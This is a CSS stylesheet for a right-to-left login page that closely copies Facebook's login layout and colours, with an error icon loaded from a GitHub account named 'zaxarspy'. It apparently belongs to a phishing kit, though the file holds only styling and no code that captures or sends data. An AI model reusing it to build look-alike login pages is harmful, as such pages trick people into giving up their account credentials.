        body {
            margin: 0;
            padding: 0;
            background: #fff;
            direction: rtl;
            font-family: arial;
        }
        
        .zb {
            background: #f0f2f5;
            height: 620px;
        }
        
         ::placeholder {
            color: #9d949c;
        }
        
        .cen {
            text-align: center;
        }
        
        .zimg {
            height: 84px;
            padding-top: 35px;
        }
        
        .zform {
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
            margin: auto;
            padding: 0 0 14px 0;
            width: 396px;
            background-color: #fff;
        }
        
        .zform p:nth-child(1) {
            padding: 24px 0 16px 0;
            font-size: 18px;
            line-height: 22px;
            margin: 0;
        }
        
        .zinput {
            border-radius: 6px;
            font-size: 17px;
            padding: 14px 16px;
            width: 364px;
            border: 1px solid #dddfe2;
            color: #1d2129;
            margin: 6px 0;
        }
        
        .zinlog {
            background-color: #1877f2;
            color: #fff;
            font-weight: bold;
            font-size: 20px;
            cursor: pointer;
        }
        
        .zinlog:hover {
            background-color: #176cdb;
        }
        
        .zform form {
            margin-bottom: 6px;
        }
        
        .zforg {
            color: #1877f2;
            font-size: 14px;
            font-weight: 500;
            text-decoration: none;
            padding: 10px 0 2px;
            display: block;
        }
        
        .zforg:hover {
            text-decoration: underline;
        }
        
        .zforgm {
            display: none;
        }
        
        .zor {
            direction: ltr;
            margin: 10px;
        }
        
        .zor span {
            color: #96999e;
            font-size: 12px;
        }
        
        .zor span:before,
        .zor span:after {
            content: "";
            display: inline-block;
            width: 46%;
            margin: 0 .5em 0 -55%;
            vertical-align: middle;
            background: #d7dade;
            height: 2px;
        }
        
        .zor span:after {
            margin: 0 -55% 0 .5em;
        }
        
        .zc {
            border: none;
            border-radius: 6px;
            font-size: 17px;
            line-height: 48px;
            padding: 0 16px;
            cursor: pointer;
            display: inline-block;
            text-decoration: none;
            white-space: nowrap;
            background-color: #42b72a;
            color: #fff;
            font-weight: bold;
            margin: 6px 0;
        }
        
        .zc:hover {
            background-color: #36a420;
        }
        
        footer {
            padding: 50px 0;
        }
        
        footer ul {
            align-items: center;
            display: flex;
            padding-top: 8px;
            flex-wrap: wrap;
            list-style-type: none;
            margin: 0;
            padding: 0;
            font-size: 12px;
            line-height: 1.34;
        }
        
        footer li {
            padding-left: 10px;
        }
        
        footer li a {
            color: #8a8d91;
            text-decoration: none;
        }
        
        footer li a:hover {
            text-decoration: underline;
        }
        
        .zf {
            margin: 0 auto;
            width: 980px;
        }
        
        .zf hr {
            background-color: #8a8d9169;
            height: 1px;
            border: 0;
        }
        
        .zf span {
            font-size: 11px;
            color: #737373;
        }
        
        .zfm {
            display: none;
        }
        
        .zs {
            display: none;
        }
        
        @media only screen and (max-width: 600px) {
            body {
                margin: 0;
                padding: 0;
                background: #fff;
                font-family: arial;
            }
            .zerrorme,
            .zerrormp {
                display: none;
                background: #fa3e3e;
                color: #fff;
                padding: 8px;
                font-size: 14px;
                animation-name: animatebottom;
                animation-duration: 3s
            }
            .zb {
                background: #fff;
                height: min-content;
            }
            .cen {
                text-align: center;
            }
            .zimg {
                height: 39.42px;
                padding: 8px 0;
            }
            .zform {
                margin: 0 auto;
                max-width: 416px;
                padding: 0 16px;
                margin-bottom: 45px;
                box-shadow: 0 0 0 rgba(0, 0, 0, .1), 0 0 0 rgba(0, 0, 0, .1);
                width: auto;
                border-radius: 0;
            }
            .zform p:nth-child(1) {
                display: none
            }
            .zinput {
                border-radius: 4px;
                box-sizing: border-box;
                width: 100%;
                padding: 12px;
                font-size: 14px;
                line-height: 18px;
                display: block;
                margin: 0;
                background-color: #f5f6f7;
                margin-bottom: 8px;
            }
            .zinlog {
                background-color: #1877f2;
                color: #fff;
                font-weight: bold;
                font-size: 17px;
                cursor: pointer;
            }
            .zinlog:hover {
                background-color: #176cdb;
            }
            .zforg {
                display: none;
            }
            .zor {
                margin: 10px;
            }
            .zor span {
                color: #4b4f56;
                font-size: 14px;
            }
            .zor span:before,
            .zor span:after {
                content: "";
                display: inline-block;
                width: 50%;
                margin: 0 .5em 0 -55%;
                vertical-align: middle;
                background: #d7dade;
                height: 2px;
            }
            .zor span:after {
                margin: 0 -55% 0 .5em;
            }
            .zc {
                background: #00a400;
                border: none;
                box-shadow: none;
                color: #fff;
                text-shadow: 0 -1px 0 rgba(0, 0, 0, .35);
                line-height: 27px;
                padding: 3px 8px 2px;
                border-radius: 4px;
                box-sizing: border-box;
                display: inline-block;
                font-weight: bold;
                min-width: 50px;
                overflow: hidden;
                text-overflow: ellipsis;
                vertical-align: bottom;
                white-space: nowrap;
                font-size: 14px;
                cursor: pointer;
                text-decoration: none;
                margin: 12px 0 12px 0;
                height: 36px;
                padding-left: 16px;
                padding-right: 16px;
                padding-top: 5px;
            }
            .zc:hover {
                background-color: #00a700;
            }
            .zforgm {
                display: block;
                color: #7596c8;
                font-family: 'Roboto-Regular', 'Helvetica', 'sans-serif';
                font-size: 14px;
                line-height: 16px;
                cursor: pointer;
                text-decoration: none;
            }
            .zforgm:hover {
                text-decoration: underline;
            }
            footer {
                text-align: center;
                padding: 0;
            }
            .zf {
                display: none;
            }
            .zfm {
                display: -webkit-flex;
                margin-bottom: 50px;
            }
            .zfm span {
                display: block;
                margin: 4px;
            }
            .zfmr,
            .zfml {
                flex: 1;
                min-width: 0;
                width: 0;
                text-align: center;
            }
            .zfm span a {
                color: #8a8d91;
                text-decoration: none;
                font-size: 12px;
                line-height: 16px;
            }
            .zs {
                font-size: 12px;
                line-height: 15px;
                color: gray;
                display: block;
            }
            #erorrmail,
            #erorrpass {
                margin-left: 4px!important;
                display: none!important;
            }
        }
        
        @media only screen and (min-width: 600px) {
            #zerrorme,
            #zerrormp {
                display: none!important;
            }
        }
        
        .zerrb {
            display: block!important;
        }
        
        .erorrborder {
            border: 2px #f03d25 solid;
            background: url(https://raw.githubusercontent.com/zaxarspy/zax/main/face/zaxarer.png) no-repeat right center;
            background-size: 31px;
            background-position-x: calc(7px);
            animation-name: animatebottom;
            animation-duration: 1s
        }
        
        #erorrmail,
        #erorrpass {
            display: none;
            color: #f02849;
            font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
            font-size: 13px;
            line-height: 16px;
            text-align: right;
            animation-name: animatebottom;
            margin: 8px 18px;
            animation-duration: 2s
        }
        
        @keyframes animatebottom {
            from {
                top: -200px;
                opacity: 0
            }
            to {
                top: 0;
                opacity: 1
            }
        }
